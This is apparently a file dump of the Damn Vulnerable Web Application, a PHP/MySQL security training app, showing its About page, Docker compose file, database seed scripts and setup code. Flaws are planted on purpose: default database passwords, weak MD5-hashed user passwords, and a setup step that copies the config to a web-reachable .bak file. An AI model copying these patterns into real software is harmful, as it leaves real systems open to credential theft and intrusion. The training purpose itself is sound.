\n\n \n\n
\n \n \n \n
\n\n \n\n
\n\n \n\n
\n\n \n\n
\n\n \n\n
\n\n \n\n
\n\n \n\n
\n\n \n\n
\n\n \n\n
\n\n \n\n
About
\r\n\tDamn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment
\r\n\tPre-August 2020, All material is copyright 2008-2015 RandomStorm & Ryan Dewhurst.
\r\n\tOngoing, All material is copyright Robin Wood and probably Ryan Dewhurst.
\r\n\r\n\tLinks
\r\n\t- \r\n\t\t
- Project Home: \" . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA' ) . \" \r\n\t\t
- Bug Tracker: \" . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA/issues' ) . \" \r\n\t\t
- Wiki: \" . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA/wiki' ) . \" \r\n\t
Credits
\r\n\t- \r\n\t\t
- Brooks Garrett: \" . dvwaExternalLinkUrlGet( 'http://brooksgarrett.com/','www.brooksgarrett.com' ) . \" \r\n\t\t
- Craig \r\n\t\t
- g0tmi1k: \" . dvwaExternalLinkUrlGet( 'https://blog.g0tmi1k.com/','g0tmi1k.com' ) . \" \r\n\t\t
- Jamesr: \" . dvwaExternalLinkUrlGet( 'https://www.creativenucleus.com/','www.creativenucleus.com' ) . \" \r\n\t\t
- Jason Jones \r\n\t\t
- RandomStorm \r\n\t\t
- Ryan Dewhurst: \" . dvwaExternalLinkUrlGet( 'https://wpscan.com/','wpscan.com' ) . \" \r\n\t\t
- Shinkurt: \" . dvwaExternalLinkUrlGet( 'http://www.paulosyibelo.com/','www.paulosyibelo.com' ) . \" \r\n\t\t
- Tedi Heriyanto: \" . dvwaExternalLinkUrlGet( 'http://tedi.heriyanto.net/','tedi.heriyanto.net' ) . \" \r\n\t\t
- Tom Mackenzie \r\n\t\t
- Robin Wood: \" . dvwaExternalLinkUrlGet( 'https://digi.ninja/','digi.ninja' ) . \" \r\n\t\t
- Zhengyang Song: \" . dvwaExternalLinkUrlGet( 'https://github.com/songzy12/','songzy12' ) . \" \r\n\t
License
\r\n\tDamn Vulnerable Web Application (DVWA) is free software: you can redistribute it and/or modify\r\n\tit under the terms of the GNU General Public License as published by\r\n\tthe Free Software Foundation, either version 3 of the License, or\r\n\t(at your option) any later version.
\r\n\r\n\tDevelopment
\r\n\tEveryone is welcome to contribute and help make DVWA as successful as it can be. All contributors can have their name and link (if they wish) placed in the credits section. To contribute pick an Issue from the Project Home to work on or submit a patch to the Issues list.
\r\n\\n\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\nexit;\r\n\r\n?>\r\n" }, { "path": "compose.yml", "content": "volumes:\n dvwa:\n\n\nnetworks:\n dvwa:\n\n\nservices:\n dvwa:\n build: .\n image: ghcr.io/digininja/dvwa:latest\n # Change `always` to `build` to build from local source\n pull_policy: always\n environment:\n - DB_SERVER=db\n depends_on:\n - db\n # Uncomment the next 2 lines to serve local source\n # volumes:\n # - ./:/var/www/html\n networks:\n - dvwa\n ports:\n - 127.0.0.1:4280:80\n restart: unless-stopped\n\n db:\n image: docker.io/library/mariadb:10\n environment:\n - MYSQL_ROOT_PASSWORD=dvwa\n - MYSQL_DATABASE=dvwa\n - MYSQL_USER=dvwa\n - MYSQL_PASSWORD=p@ssw0rd\n volumes:\n - dvwa:/var/lib/mysql\n networks:\n - dvwa\n restart: unless-stopped\n" }, { "path": "config/config.inc.php.dist", "content": "" }, { "path": "database/bac_setup.sql", "content": "-- Create tables for Broken Access Control module\n\n-- Table for access logging\nCREATE TABLE IF NOT EXISTS access_log (\n id INT AUTO_INCREMENT PRIMARY KEY,\n user_id INT NOT NULL,\n target_id INT NOT NULL,\n action VARCHAR(50) NOT NULL,\n timestamp DATETIME NOT NULL,\n FOREIGN KEY (user_id) REFERENCES users(user_id),\n FOREIGN KEY (target_id) REFERENCES users(user_id)\n) ENGINE=InnoDB;\n\n-- Table for security logging (unauthorized attempts)\nCREATE TABLE IF NOT EXISTS security_log (\n id INT AUTO_INCREMENT PRIMARY KEY,\n user_id INT NOT NULL,\n target_id INT NOT NULL,\n action VARCHAR(50) NOT NULL,\n timestamp DATETIME NOT NULL,\n ip_address VARCHAR(45) NOT NULL,\n FOREIGN KEY (user_id) REFERENCES users(user_id),\n FOREIGN KEY (target_id) REFERENCES users(user_id)\n) ENGINE=InnoDB;\n\n-- Add role column to users table if it doesn't exist\nALTER TABLE users ADD COLUMN IF NOT EXISTS role VARCHAR(20) DEFAULT 'user';\n\n-- Update admin user to have admin role\nUPDATE users SET role = 'admin' WHERE user = 'admin';\n" }, { "path": "database/create_mssql_db.sql", "content": "/*\nIn case I get round to adding MS SQL support, this creates and populates the tables.\n*/\n\nCREATE DATABASE dvwa;\n\nUSE dvwa;\n\nCREATE TABLE users (user_id INT PRIMARY KEY,first_name VARCHAR(15),last_name VARCHAR(15), [user] VARCHAR(15), password VARCHAR(32),avatar VARCHAR(70), last_login DATETIME, failed_login INT);\n\nINSERT INTO users VALUES ('1','admin','admin','admin',CONVERT(NVARCHAR(32),HashBytes('MD5', 'password'),2),'admin.jpg', GETUTCDATE(), '0'), ('2','Gordon','Brown','gordonb',CONVERT(NVARCHAR(32),HashBytes('MD5', 'abc123'),2),'gordonb.jpg', GETUTCDATE(), '0'), ('3','Hack','Me','1337',CONVERT(NVARCHAR(32),HashBytes('MD5', 'charley'),2),'1337.jpg', GETUTCDATE(), '0'), ('4','Pablo','Picasso','pablo',CONVERT(NVARCHAR(32),HashBytes('MD5', 'letmein'),2),'pablo.jpg', GETUTCDATE(), '0'), ('5', 'Bob','Smith','smithy',CONVERT(NVARCHAR(32),HashBytes('MD5', 'password'),2),'smithy.jpg', GETUTCDATE(), '0');\n\nCREATE TABLE guestbook (comment_id INT IDENTITY(1,1) PRIMARY KEY, comment VARCHAR(300), name VARCHAR(100),2);\n\nINSERT INTO guestbook (comment, name) VALUES ('This is a test comment.','test');\n" }, { "path": "database/create_oracle_db.sql", "content": "/* Create a copy of the database and contents in Oracle */\n\nCREATE TABLE users (\nuser_id NUMBER NOT NULL,\nfirst_name varchar(20) DEFAULT NULL,\nlast_name varchar(20) DEFAULT NULL,\n\"user\" varchar(20) DEFAULT NULL,\npassword varchar(20) DEFAULT NULL,\navatar varchar(20) DEFAULT NULL,\nlast_login TIMESTAMP,\nfailed_login NUMBER,\nPRIMARY KEY (user_id)\n);\n\nCREATE TABLE guestbook\n(comment_id NUMBER GENERATED BY DEFAULT AS IDENTITY,\n\"comment\" VARCHAR(100) DEFAULT NULL,\n\"name\" VARCHAR(100) NOT NULL,\nPRIMARY KEY (comment_id));\n\nINSERT INTO users values ('1','admin','admin','admin',('password'),'admin.jpg', sysdate, '0');\nINSERT INTO users values ('2','Gordon','Brown','gordonb',('abc123'),'gordonb.jpg', sysdate, '0');\nINSERT INTO users values ('3','Hack','Me','1337',('charley'),'1337.jpg', sysdate, '0');\nINSERT INTO users values ('4','Pablo','Picasso','pablo',('letmein'),'pablo.jpg', sysdate, '0');\nINSERT INTO users values ('5','Bob','Smith','smithy',('password'),'smithy.jpg', sysdate, '0');\n\nINSERT INTO guestbook (\"comment\", \"name\") VALUES ('What a brilliant app!', 'Marcel Marceau');\n" }, { "path": "database/create_postgresql_db.sql", "content": "CREATE TABLE users (user_id INT PRIMARY KEY,first_name VARCHAR(15),last_name VARCHAR(15), \"user\" VARCHAR(15), password VARCHAR(32),avatar VARCHAR(70), last_login timestamp, failed_login INT);\n\nINSERT INTO users VALUES ('1','admin','admin','admin',MD5('password'),'admin.jpg', CURRENT_TIMESTAMP, '0'),('2','Gordon','Brown','gordonb',MD5('abc123'),'gordonb.jpg', CURRENT_TIMESTAMP, '0'), ('3','Hack','Me','1337',MD5('charley'),'1337.jpg', CURRENT_TIMESTAMP, '0'), ('4','Pablo','Picasso','pablo',MD5('letmein'),'pablo.jpg', CURRENT_TIMESTAMP, '0'), ('5', 'Bob','Smith','smithy',MD5('password'),'smithy.jpg', CURRENT_TIMESTAMP, '0');\n\nCREATE TABLE guestbook (comment_id serial PRIMARY KEY, comment VARCHAR(300), name VARCHAR(100));\n\nINSERT INTO guestbook (comment, name) VALUES ('This is a test comment.','test');\n" }, { "path": "database/create_sqlite_db.sql", "content": "CREATE TABLE `users` (\n`user_id` int NOT NULL,\n`first_name` text DEFAULT NULL,\n`last_name` text DEFAULT NULL,\n`user` text DEFAULT NULL,\n`password` text DEFAULT NULL,\n`avatar` text DEFAULT NULL,\n`last_login` datetime,\n`failed_login` int,\nPRIMARY KEY (`user_id`)\n);\n\nCREATE TABLE `guestbook` (\n`comment_id` int,\n`comment` text default null,\n`name` text DEFAULT NULL,\nPRIMARY KEY (`comment_id`)\n);\n\n\ninsert into users values ('1','admin','admin','admin',('password'),'admin.jpg', DATE(), '0');\ninsert into users values ('2','Gordon','Brown','gordonb',('abc123'),'gordonb.jpg', DATE(), '0');\ninsert into users values ('3','Hack','Me','1337',('charley'),'1337.jpg', DATE(), '0');\ninsert into users values ('4','Pablo','Picasso','pablo',('letmein'),'pablo.jpg', DATE(), '0');\ninsert into users values ('5','Bob','Smith','smithy',('password'),'smithy.jpg', DATE(), '0');;\n\ninsert into guestbook values ('1', 'What a brilliant app!', 'Marcel Marceau');\n" }, { "path": "docs/pdf.html", "content": "Damn Vulnerable Web Application (DVWA) Official Documentation PDF v1.3\r\n" }, { "path": "dvwa/css/help.css", "content": "body {\r\n\tbackground-color: #e7e7e7;\r\n\tfont-family: Arial, Helvetica, sans-serif;\r\n\tfont-size: 13px;\r\n}\r\n\r\nh1 {\r\n\tfont-size: 25px;\r\n}\r\n\r\ndiv#container {\r\n}\r\n\r\ndiv#code {\r\n\tbackground-color: #ffffff;\r\n}\r\n\r\ndiv#area {\r\n\tmargin-left: 30px;\r\n}\r\n\r\nspan.spoiler {\r\n\tbackground-color: black;\r\n\tcolor: black;\r\n}\r\n\r\n/* === Dark theme === */\r\nbody.dark {\r\n\tbackground: #2f2f2f;\r\n\tcolor: #f8fafa;\r\n}\r\n\r\nbody.dark a {\r\n\tcolor: #99cc33;\r\n}\r\n\r\nbody.dark div#code {\r\n\tbackground-color: #2f2f2f;\r\n\tcolor: #f8fafa;\r\n}\r\n\r\nbody.dark table {\r\n\tbackground-color: #2f2f2f;\r\n\tborder: none !important;\r\n}" }, { "path": "dvwa/css/login.css", "content": "body {\r\n\tbackground: #fefffe;\r\n\tfont: 12px/15px Arial, Helvetica, sans-serif;\r\n\tline-height: 20px;\r\n\tcolor: #6b6b6b;\r\n}\r\n\r\n#wrapper {\r\n\ttext-align: center;\r\n\tmargin: 0 auto;\r\n}\r\n\r\n#content {\r\n\tdisplay: inline-block;\r\n\tpadding: 20px;\r\n\twidth: auto;\r\n}\r\n\r\n#footer {\r\n\tposition: absolute;\r\n\twidth: 100%;\r\n\theight: 50px;\r\n\tbottom: 0px;\r\n\tleft: 0px;\r\n}\r\n\r\nlabel {\r\n\tfloat: left;\r\n\ttext-align: right;\r\n\tmargin-right: 0.5em;\r\n\tdisplay: block;\r\n\toverflow: hidden;\r\n\tpadding-right: 50px;\r\n\tfont-weight: bold;\r\n}\r\n\r\n.loginInput {\r\n\tfloat: left;\r\n\tcolor: #6B6B6B;\r\n\twidth: 320px;\r\n\tbackground-color: #F4F4F4;\r\n\tborder: 1px;\r\n\tborder-style: solid;\r\n\tborder-color: #c4c4c4;\r\n\tpadding: 6px;\r\n\tmargin-bottom: 12px;\r\n}\r\n\r\nfieldset {\r\n\twidth: 350px;\r\n\tpadding: 10px 20px 10px 20px;\r\n\toverflow: hidden;\r\n\tborder-style: none;\r\n}\r\n\r\np {\r\n\tfont-size: 10px;\r\n}\r\n\r\n" }, { "path": "dvwa/css/main.css", "content": "body {\r\n\tmargin: 0;\r\n\tcolor: #2f2f2f;\r\n\tfont: 12px/15px Arial, Helvetica, sans-serif;\r\n\tmin-width: 981px;\r\n\theight: 100%;\r\n\tposition: relative;\r\n}\r\n\r\nbody.home {\r\n\tbackground: #e7e7e7;\r\n}\r\n\r\ndiv.clear {\r\n\tclear: both;\r\n}\r\n\r\na {\r\n\tcolor: #99cc33;\r\n\ttext-decoration: underline;\r\n\tfont-weight: bold;\r\n}\r\n\r\na img {\r\n\tborder: 0;\r\n}\r\n\r\na: hover {\r\n\ttext-decoration: none;\r\n}\r\n\r\ninput, textarea, select {\r\n\tfont: 100% arial,sans-serif;\r\n\tvertical-align: middle;\r\n}\r\n\r\nform,fieldset {\r\n\tmargin: 0;\r\n\tpadding: 0;\r\n\tborder-style: none;\r\n}\r\n\r\nem {\r\n\tfont-weight: bold;\r\n\tfont-style: normal;\r\n}\r\n\r\nh1, h2, h3, h4, h5, h6 {\r\n\tmargin-top: 0px;\r\n}\r\n\r\nh1 {\r\n\tfont-size: 200%;\r\n}\r\n\r\nh2 {\r\n\tfont-size: 160%;\r\n}\r\n\r\n\r\nh3 {\r\n\tfont-size: 130%;\r\n}\r\n\r\nhr {\r\n\tborder-width: 0px;\r\n\tcolor: #C3D9FF;\r\n\tbackground-color: #C3D9FF;\r\n\theight: 1px;\r\n}\r\n\r\nul.menuBlocks {\r\n\tlist-style-type: none;\r\n\tpadding-left: 0px;\r\n\tmargin-top: 0px;\r\n\tmargin-bottom: 0px;\r\n\tmargin-left: 0px;\r\n}\r\n\r\nul + ul, ul + ul.menuBlocks, ul + h1, ul + h2, ul + p {\r\n\tmargin-top: 20px;\r\n}\r\n\r\n.fixed {\r\n\tfont-family: Fixed, Courier, monospace;\r\n\tfont-size: 13px;\r\n}\r\n\r\ndiv.nearly {\r\n\tborder: 2px solid #0000ff;\r\n\tpadding: 10px 20px 10px 20px;\r\n\tmargin-top: 15px;\r\n\tmargin-bottom: 15px;\r\n}\r\n\r\ndiv.success {\r\n\tborder: 2px solid #00ff00;\r\n\tpadding: 10px 20px 10px 20px;\r\n\ttext-align: center;\r\n\tfont-weight: bold;\r\n\tmargin-top: 15px;\r\n\tmargin-bottom: 15px;\r\n}\r\n\r\ndiv.warning {\r\n\tborder: 2px solid #ff0000;\r\n\tpadding: 10px 20px 10px 20px;\r\n\tcolor: #800000;\r\n\tmargin-top: 15px;\r\n\tmargin-bottom: 15px;\r\n}\r\n\r\ndiv.warning h1 {\r\n\tcolor: #ff0000;\r\n}\r\n\r\ndiv.message {\r\n\tborder: 1px solid #C0C0C0;\r\n\tpadding: 5px;\r\n\tmargin: 10px 0px 10px 0px;\r\n\tbackground-color: #f8fafa;\r\n\twidth: 45%;\r\n}\r\n\r\ndiv#container {\r\n\twidth: 900px;\r\n\theight: 100%;\r\n\tmargin-left: auto;\r\n\tmargin-right: auto;\r\n\tbackground: #f4f4f4;\r\n\tfont-size: 13px;\r\n}\r\n\r\ndiv#header {\r\n\tposition: relative;\r\n\tpadding: 10px;\r\n\toverflow: hidden;\r\n\tbackground: #2f2f2f;\r\n\tborder-bottom: 5px solid #A1CC33;\r\n\ttext-align: center;\r\n}\r\n\r\ndiv#system_info {\r\n\tpadding: 10px;\r\n\ttext-align: right;\r\n}\r\n\r\ndiv#main_body {\r\n\tfloat: right;\r\n\twidth: 693px;\r\n\tbackground: #f4f4f4;\r\n\tpadding-top: 20px;\r\n\tpadding-bottom: 10px;\r\n\tfont-size: 13px;\r\n}\r\n\r\ndiv.body_padded {\r\n\tpadding-left: 20px;\r\n\tpadding-right: 20px;\r\n}\r\n\r\ndiv#main_menu {\r\n\tfloat: left;\r\n\twidth: 200px;\r\n\theight: 100%;\r\n\tbackground-color: #f4f4f4;\r\n\tpadding-top: 10px;\r\n\tpadding-bottom: 10px;\r\n}\r\n\r\ndiv#main_menu li {\r\n\tborder-width: 1px;\r\n\tborder-style: solid;\r\n\tborder-color: #D2D4D4 #6B778C #6B778C #D2D4D4;\r\n\tpadding: 3px 5px 3px 5px;\r\n\tmargin-bottom: 3px;\r\n\tbackground-color: #bebebe;\r\n}\r\n\r\ndiv#main_menu li a {\r\n\tcolor: #000000;\r\n\ttext-decoration: none;\r\n\tdisplay: block;\r\n}\r\n\r\ndiv#main_menu li:hover {\r\n background-color: #ccc;\r\n}\r\n\r\n\r\ndiv#main_menu li.selected {\r\n\tborder-color: #758DAE #758DAE #758DAE #758DAE;\r\n\tbackground-color: #99cc33;\r\n}\r\n\r\ndiv#main_menu li.selected a {\r\n\tcolor: #F9F7ED;\r\n}\r\n\r\ndiv#main_menu li: hover {\r\n\tborder-color: #D2D4D4;\r\n}\r\n\r\ndiv#main_menu li: hover a {\r\n\tcolor: #F9F7ED;\r\n}\r\n\r\ndiv#main_menu_padded {\r\n\tpadding: 15px;\r\n}\r\n\r\ndiv#footer {\r\n\tcolor: #999999;\r\n\tbackground: #2f2f2f;\r\n\tpadding: 10px;\r\n\ttext-align: center;\r\n\tborder-top: 5px solid #A1CC33;\r\n}\r\n\r\n.popup_button {\r\n border-width: 1px;\r\n border-style: solid;\r\n border-color: #D2D4D4 #6B778C #6B778C #D2D4D4;\r\n padding: 3px 5px;\r\n margin-bottom: 3px;\r\n background-color: #bebebe;\r\n font-weight: bold;\r\n float: right;\r\n cursor: pointer;\r\n color: #000000;\r\n}\r\n\r\n.popup_button:hover {\r\n\tcolor: white;\r\n background-color: #A1CC33;\r\n}\r\n\r\n\r\n\r\n\r\ndiv.vulnerable_code_area {\r\n\tbackground-color: #f8fafa;\r\n\tborder-width: 1px;\r\n\tborder-style: solid;\r\n\tborder-color: #000000;\r\n\tpadding: 10px 20px 10px 20px;\r\n\tmargin-bottom: 20px;\r\n}\r\n\r\ndiv#guestbook_comments {\r\n\twidth: 45%;\r\n\tbackground-color: #f8fafa;\r\n\tborder-width: 1px;\r\n\tborder-style: solid;\r\n\tborder-color: #C0C0C0;\r\n\tpadding: 5px 10px 5px 10px;\r\n\tmargin-bottom: 5px;\r\n}\r\n\r\ndiv#idslog {\r\n\tborder: 1px solid #C0C0C0;\r\n\tpadding: 5px;\r\n\tmargin: 10px 0px 10px 0px;\r\n\tbackground-color: #f8fafa;\r\n}\r\n\r\npre {\r\n\tcolor: red;\r\n}\r\n\r\ndiv.submenu {\r\n\tborder-bottom: 1px solid #000000;\r\n\tmargin-bottom: 15px;\r\n\tpadding: 4px 0px 10px 0px;\r\n\tfont-size: 13px;\r\n}\r\n\r\nspan.submenu_item {\r\n\tpadding: 0px 10px 0px 10px;\r\n}\r\n\r\nspan.submenu_item + span.submenu_item {\r\n\tborder-left: 1px dashed #000000;\r\n\tfont-size: 13px;\r\n}\r\n\r\nspan.selected {\r\n\tfont-weight: bold;\r\n}\r\n\r\nspan.success {\r\n\r\n\tcolor:green;\r\n}\r\n\r\nspan.failure {\r\n\tcolor:red;\r\n\tfont-weight: bold;\r\n}\r\n\r\n.theme-icon {\r\n\tposition: absolute;\r\n\tright: 0;\r\n}\r\n\r\n.theme-icon img {\r\n\theight: 32px;\r\n\twidth: 32px;\r\n}\r\n\r\n\r\n/* === Dark theme === */\r\nbody.home.dark {\r\n\tbackground: #2f2f2f;\r\n\tcolor: #f8fafa;\r\n}\r\n\r\nbody.home.dark #container,\r\nbody.home.dark #main_menu,\r\nbody.home.dark #main_body,\r\nbody.home.dark #system_info {\r\n\tbackground: #2f2f2f;\r\n}\r\n\r\nbody.home.dark .vulnerable_code_area {\r\n\tbackground: #2f2f2f;\r\n}\r\n\r\nbody.home.dark .message {\r\n\tbackground-color: #2f2f2f;\r\n}\r\n\r\nbody.home.dark div#guestbook_comments {\r\n\tbackground-color: #2f2f2f;\r\n}\r\n\r\n.notice {\r\n\tcolor: red;\r\n\tfont-weight: bold;\r\n}\r\n" }, { "path": "dvwa/css/source.css", "content": "body {\r\n\tbackground-color: #e7e7e7;\r\n\tfont-family: Arial, Helvetica, sans-serif;\r\n\tfont-size: 13px;\r\n}\r\n\r\nh1 {\r\n\tfont-size: 25px;\r\n}\r\n\r\ndiv#container {\r\n}\r\n\r\ndiv#code {\r\n\tbackground-color: #ffffff;\r\n}\r\n\r\ndiv#area {\r\n\tmargin-left: 30px;\r\n}\r\n\r\n.loginSuccess {\r\n\tcolor: #638323;\r\n}\r\n\r\n.loginFail {\r\n\tcolor: #a50a0a;\r\n}\r\n\r\n/* === Dark theme === */\r\nbody.dark {\r\n\tbackground: #2f2f2f;\r\n\tcolor: #f8fafa;\r\n}\r\n\r\nbody.dark a {\r\n\tcolor: #99cc33;\r\n}\r\n\r\nbody.dark div#code {\r\n\tbackground-color: #bdbdbd;\r\n}\r\n\r\nbody.dark table {\r\n\tbackground-color: #2f2f2f;\r\n\tborder: none !important;\r\n}" }, { "path": "dvwa/includes/DBMS/MySQL.php", "content": "Please check the config file.Database Error #\" . mysqli_connect_errno() . \": \" . mysqli_connect_error() . \".\" );\n\tif ($_DVWA[ 'db_user' ] == \"root\") {\n\t\tdvwaMessagePush( 'Your database user is root, if you are using MariaDB, this will not work, please read the README.md file.' );\n\t}\n\tdvwaPageReload();\n}\n\n// Create database\n$drop_db = \"DROP DATABASE IF EXISTS {$_DVWA[ 'db_database' ]};\";\nif( !@mysqli_query($GLOBALS[\"___mysqli_ston\"], $drop_db ) ) {\n\tdvwaMessagePush( \"Could not drop existing database
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n\tdvwaPageReload();\n}\n\n$create_db = \"CREATE DATABASE {$_DVWA[ 'db_database' ]};\";\nif( !@mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_db ) ) {\n\tdvwaMessagePush( \"Could not create database
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n\tdvwaPageReload();\n}\ndvwaMessagePush( \"Database has been created.\" );\n\n\n// Create table 'users'\nif( !@((bool)mysqli_query($GLOBALS[\"___mysqli_ston\"], \"USE \" . $_DVWA[ 'db_database' ])) ) {\n\tdvwaMessagePush( 'Could not connect to database.' );\n\tdvwaPageReload();\n}\n\n$create_tb = \"CREATE TABLE users (user_id int(6),first_name varchar(15),last_name varchar(15), user varchar(15), password varchar(32),avatar varchar(70), last_login TIMESTAMP, failed_login INT(3), PRIMARY KEY (user_id));\";\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_tb ) ) {\n\tdvwaMessagePush( \"Table could not be created
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n\tdvwaPageReload();\n}\ndvwaMessagePush( \"'users' table was created.\" );\n\n\n// Insert some data into users\n$base_dir= str_replace (\"setup.php\", \"\", $_SERVER['SCRIPT_NAME']);\n$avatarUrl = $base_dir . 'hackable/users/';\n\n$insert = \"INSERT INTO users VALUES\n\t('1','admin','admin','admin',MD5('password'),'{$avatarUrl}admin.jpg', NOW(), '0'),\n\t('2','Gordon','Brown','gordonb',MD5('abc123'),'{$avatarUrl}gordonb.jpg', NOW(), '0'),\n\t('3','Hack','Me','1337',MD5('charley'),'{$avatarUrl}1337.jpg', NOW(), '0'),\n\t('4','Pablo','Picasso','pablo',MD5('letmein'),'{$avatarUrl}pablo.jpg', NOW(), '0'),\n\t('5','Bob','Smith','smithy',MD5('password'),'{$avatarUrl}smithy.jpg', NOW(), '0');\";\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $insert ) ) {\n\tdvwaMessagePush( \"Data could not be inserted into 'users' table
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n\tdvwaPageReload();\n}\ndvwaMessagePush( \"Data inserted into 'users' table.\" );\n\n// Add role column to users table\n$alter_users = \"ALTER TABLE users ADD COLUMN IF NOT EXISTS role VARCHAR(20) DEFAULT 'user';\";\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $alter_users) ) {\n dvwaMessagePush( \"Could not add role column to users table
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n dvwaPageReload();\n}\ndvwaMessagePush( \"Added role column to users table.\" );\n\n// Set admin user role\n$update_admin = \"UPDATE users SET role = 'admin' WHERE user = 'admin';\";\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $update_admin) ) {\n dvwaMessagePush( \"Could not set admin role
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n dvwaPageReload();\n}\ndvwaMessagePush( \"Updated admin user role.\" );\n\n// Create access_log table\n$create_access_log = \"CREATE TABLE access_log (\n id INT AUTO_INCREMENT PRIMARY KEY,\n user_id INT NOT NULL,\n target_id INT NOT NULL,\n action VARCHAR(50) NOT NULL,\n timestamp DATETIME NOT NULL,\n FOREIGN KEY (user_id) REFERENCES users(user_id),\n FOREIGN KEY (target_id) REFERENCES users(user_id)\n) ENGINE=InnoDB;\";\n\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_access_log) ) {\n dvwaMessagePush( \"Could not create access_log table
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n dvwaPageReload();\n}\ndvwaMessagePush( \"'access_log' table was created.\" );\n\n// Create security_log table\n$create_security_log = \"CREATE TABLE security_log (\n id INT AUTO_INCREMENT PRIMARY KEY,\n user_id INT NOT NULL,\n target_id INT NOT NULL,\n action VARCHAR(50) NOT NULL,\n timestamp DATETIME NOT NULL,\n ip_address VARCHAR(45) NOT NULL,\n FOREIGN KEY (user_id) REFERENCES users(user_id),\n FOREIGN KEY (target_id) REFERENCES users(user_id)\n) ENGINE=InnoDB;\";\n\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_security_log) ) {\n dvwaMessagePush( \"Could not create security_log table
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n dvwaPageReload();\n}\ndvwaMessagePush( \"'security_log' table was created.\" );\n\n// Create guestbook table\n$create_tb_guestbook = \"CREATE TABLE guestbook (comment_id SMALLINT UNSIGNED NOT NULL AUTO_INCREMENT, comment varchar(300), name varchar(100), PRIMARY KEY (comment_id));\";\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_tb_guestbook) ) {\n dvwaMessagePush( \"Table could not be created
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n dvwaPageReload();\n}\ndvwaMessagePush( \"'guestbook' table was created.\" );\n\n// Insert data into 'guestbook'\n$insert = \"INSERT INTO guestbook VALUES ('1','This is a test comment.','test');\";\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $insert) ) {\n dvwaMessagePush( \"Data could not be inserted into 'guestbook' table
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n dvwaPageReload();\n}\ndvwaMessagePush( \"Data inserted into 'guestbook' table.\" );\n\n// Copy .bak for a fun directory listing vuln\n$conf = DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php';\n$bakconf = DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php.bak';\nif (file_exists($conf)) {\n // Who cares if it fails. Suppress.\n @copy($conf, $bakconf);\n}\n\ndvwaMessagePush( \"Backup file /config/config.inc.php.bak automatically created\" );\n\n// Add account_enabled columns to users table\n$alter_users_dept = \"ALTER TABLE users \n ADD COLUMN IF NOT EXISTS account_enabled TINYINT(1) DEFAULT 1;\";\nif( !mysqli_query($GLOBALS[\"___mysqli_ston\"], $alter_users_dept) ) {\n dvwaMessagePush( \"Could not add account_enabled column to users table
SQL: \" . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) );\n dvwaPageReload();\n}\ndvwaMessagePush( \"Added account_enabled columns to users table.\" );\n\n// Done\ndvwaMessagePush( \"Setup successful!\" );\n\nif( !dvwaIsLoggedIn())\n dvwaMessagePush( \"Please login.\" );\ndvwaPageReload();\n\n?>\n" }, { "path": "dvwa/includes/DBMS/PGSQL.php", "content": "Please check the config file.\" );\r\n\tdvwaPageReload();\r\n}\r\n\r\n// Create database\r\n$drop_db = \"DROP DATABASE IF EXISTS {$_DVWA[ 'db_database' ]};\";\r\n\r\nif( !@pg_query($drop_db) ) {\r\n\tdvwaMessagePush( \"Could not drop existing database
SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\n\r\n$create_db = \"CREATE DATABASE {$_DVWA[ 'db_database' ]};\";\r\n\r\nif( !@pg_query ( $create_db ) ) {\r\n\tdvwaMessagePush( \"Could not create database
